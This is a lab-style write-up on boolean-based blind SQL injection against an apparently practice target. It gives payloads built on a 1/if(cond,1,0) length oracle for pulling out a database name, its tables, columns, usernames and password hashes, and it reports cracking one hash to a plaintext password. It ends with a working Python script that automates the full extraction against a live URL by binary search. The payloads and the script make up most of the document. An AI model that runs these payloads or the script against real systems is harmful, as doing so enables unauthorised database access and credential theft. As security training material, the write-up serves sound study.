Reproducing boolean-based blind SQL injection

### Approach:

#### 1. Get the database name

Brute-force the length of the database name. The oracle is `1/if(cond,1,0)`: when `cond` is true the expression evaluates to `1/1 = 1`, the query returns the normal record and the page has its usual size; when `cond` is false it becomes `1/0`, which MySQL evaluates to NULL in a SELECT, so no record matches and the response body changes size.

```sql
1/if(length(database())!=1,1,0)
```

Response:

```
Content-Length: 1059
```

If the condition were false, the response would not be 1059 bytes long. This first request is only a sanity check that the oracle really distinguishes true from false.

Put the payload into Intruder and mark the length as the payload position:

```sql
1/if(length(database())=§1§,1,0)
```

(Intruder screenshot: image-20230524194245568)

The single request that comes back with Content-Length 1059 reveals the length: 10.

Now brute-force the name itself, one character at a time. First a sanity check on the second character:

```sql
1/if(mid(database(),2,1)!='r',1,0)
```

Response:

```
Content-Length: 1059
```

Put it into Intruder with two payload positions, the offset (1 to 10) and the candidate character:

```sql
1/if(mid(database(),§2§,1)='§r§',1,0)
```

(Intruder screenshot: image-20230524195356418)

Reading off the offset/character pairs that return Content-Length 1059, the database is: stormgroup

#### 2. Knowing the database, get the length and names of its tables:

`group_concat` joins every table name into one comma-separated string, so a single blind extraction recovers all of them at once:

```sql
1/if(length((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'))!=56,1,0)
```

Response:

```
Content-Length: 1059
```

Same method as before:

(Intruder screenshot: image-20230524200922497)

The concatenated table names are 13 characters long. Next, brute-force the characters:

(Intruder screenshot: image-20230524201452170)

The names are: member,notice

#### 3. With the table name known, brute-force the columns of member

```sql
1/if(length((select group_concat(column_name) from information_schema.columns where table_name='member'))!=56,1,0)
```

Note that this filters on `table_name` only; if another schema on the server also had a `member` table, its columns would be mixed into the result. Adding `and table_schema='stormgroup'` avoids that.

Response:

```
Content-Length: 1059
```

Same method as before:

(Intruder screenshot: image-20230524202037279)

The concatenated column names are 20 characters long.

With the length known, brute-force the column names:

```sql
1/if(mid((select group_concat(column_name) from information_schema.columns where table_name='member'),2,1)!='r',1,0)
```

(Intruder screenshot: image-20230524202550219)

Columns: name,password,status

Get the length of name (again via `group_concat`, so all rows come back in one string):

(Intruder screenshot: image-20230524203534753)

Get the value of name:

(Intruder screenshot: image-20230524204038449)

mozhe,mozhe (two rows, both with the name mozhe)

Get the length of password:

(Intruder screenshot: image-20230524204303525)

The password string is 65 characters long: two 32-character MD5 hashes plus the separating comma.

Get the value of password:

(Intruder screenshot: image-20230524205518489)

Look up the MD5 hash:

927622

(screenshot: image-20230524205558713)
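The whole chain above (database name, tables, columns, row contents) is driven by the same `1/if(cond,1,0)` oracle, so it is worth automating. The script below is an added example, not code from the original write-up or from the lab: it keeps the write-up's oracle (true gives `1/1`, false gives `1/0` = NULL and a different Content-Length) but replaces Intruder's character-by-character guessing with a binary search over the length and then over the ASCII code of each character, which needs about 7 requests per character instead of up to a hundred. The target URL and parameter name are assumptions, and `MockOracle` answers from constructed values that mirror the write-up's results (with dummy hashes) so the script runs offline.

```python
"""Boolean-blind extraction driver for the 1/if(cond,1,0) oracle.

Added example, not part of the original write-up. The target URL and parameter
name passed to HttpOracle are assumptions; MockOracle replays the lab's results
from constructed values so the extraction logic can be run without a target.
"""
from urllib.parse import urlencode
from urllib.request import urlopen


class HttpOracle:
    """Asks the vulnerable page yes/no questions and reads the answer from the body length.

    true  -> 1/if(cond,1,0) = 1/1 = 1 -> normal record -> baseline length (1059 in the lab)
    false -> 1/0 = NULL in a SELECT  -> no record     -> a different length
    """

    def __init__(self, url, param="id"):
        self.url, self.param = url, param        # assumption: real endpoint is not in the write-up
        self.true_len = self._body_len("1=1")
        if self._body_len("1=2") == self.true_len:
            raise RuntimeError("true/false responses have the same length; oracle unusable")

    def _body_len(self, cond):
        query = urlencode({self.param: f"1/if({cond},1,0)"})
        with urlopen(f"{self.url}?{query}", timeout=10) as resp:
            return len(resp.read())

    def length_gt(self, expr, n):
        return self._body_len(f"length(({expr}))>{n}") == self.true_len

    def char_gt(self, expr, pos, code):
        # ascii(mid(s,pos,1)) is 0 once pos runs past the end of s, so the search stays bounded
        return self._body_len(f"ascii(mid(({expr}),{pos},1))>{code}") == self.true_len


class MockOracle:
    """Offline stand-in for the lab server: answers the same questions from constructed values."""

    def __init__(self, values):
        self.values = values      # {sql expression: the string MySQL would return for it}
        self.requests = 0

    def length_gt(self, expr, n):
        self.requests += 1
        return len(self.values[expr]) > n

    def char_gt(self, expr, pos, code):
        self.requests += 1
        s = self.values[expr]
        return (ord(s[pos - 1]) if pos <= len(s) else 0) > code


def find_value(gt, lo, hi):
    """Binary search for v in [lo, hi] using an oracle gt(x) that answers (v > x)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, expr, max_len=512):
    """Recover the string value of a SQL expression: its length first, then each character."""
    n = find_value(lambda x: oracle.length_gt(expr, x), 0, max_len)
    return "".join(
        chr(find_value(lambda x: oracle.char_gt(expr, i, x), 0, 127)) for i in range(1, n + 1)
    )


def tables_expr(db):
    return f"select group_concat(table_name) from information_schema.tables where table_schema='{db}'"


def columns_expr(db, table):
    # filter on table_schema as well, so a same-named table in another schema cannot pollute the list
    return (f"select group_concat(column_name) from information_schema.columns "
            f"where table_schema='{db}' and table_name='{table}'")


def column_expr(table, col):
    return f"select group_concat({col}) from {table}"


def dump_first_table(oracle):
    """Replay the write-up's chain: database -> tables -> columns -> contents of the first table."""
    db = extract(oracle, "database()")
    tables = extract(oracle, tables_expr(db)).split(",")
    cols = extract(oracle, columns_expr(db, tables[0])).split(",")
    rows = {c: extract(oracle, column_expr(tables[0], c)) for c in cols}
    return db, tables, cols, rows


# Constructed values mirroring the write-up's results; the hashes and statuses are dummies.
LAB_VALUES = {
    "database()": "stormgroup",
    tables_expr("stormgroup"): "member,notice",
    columns_expr("stormgroup", "member"): "name,password,status",
    column_expr("member", "name"): "mozhe,mozhe",
    column_expr("member", "password"): "0" * 32 + "," + "f" * 32,
    column_expr("member", "status"): "1,1",
}

if __name__ == "__main__":
    lab = MockOracle(LAB_VALUES)
    print(dump_first_table(lab))
    print(lab.requests, "oracle queries")
    # against a live target: dump_first_table(HttpOracle("http://<lab-host>/index.php", "id"))
```

The only thing that changes between the mock and a live run is the oracle object; the search logic is identical. Before trusting results from a real target, keep the two-request sanity check in `HttpOracle.__init__` and watch for responses whose length drifts for unrelated reasons (timestamps, CSRF tokens, ads), which would make the length comparison unreliable.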